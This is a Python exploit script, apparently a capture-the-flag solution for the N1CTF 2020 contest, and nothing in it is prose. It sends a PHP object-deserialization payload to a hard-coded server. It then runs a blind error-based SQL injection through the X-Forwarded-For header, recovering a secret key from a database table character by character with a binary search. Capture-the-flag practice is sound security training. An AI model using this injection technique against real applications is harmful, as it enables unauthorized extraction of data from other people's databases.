1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31
| import requests
url='http://101.32.205.189/?input=O:4:"flag":2:{s:2:"ip";O:2:"ip":1:{s:2:"ip";N;}s:5:"check";N;}' flag='' for i in range(1,500): f1=flag top=127 low=33 while low<=top: mid=(top+low)//2 p1="1' or updatexml(1,concat(0x7c,if(ascii(substr((select group_concat(`key`) from n1key),{},1))>{},database(),0)),1) or '".format(str(i),str(mid)) p2="1' or updatexml(1,concat(0x7c,if(ascii(substr((select group_concat(`key`) from n1key),{},1))={},database(),0)),1) or '".format(str(i),str(mid)) headers1={'X-Forwarded-For':p1} headers2={'X-Forwarded-For':p2} try: r1=requests.get(url,headers=headers2) print(i,mid) if '<code>welcome to n1ctf2020</code>' in r1.text: flag+=chr(mid) print(flag) break r=requests.get(url,headers=headers1) if '<code>welcome to n1ctf2020</code>' in r.text: low=mid+1 else: top=mid-1 except Exception as e: pass
if flag==f1: break
|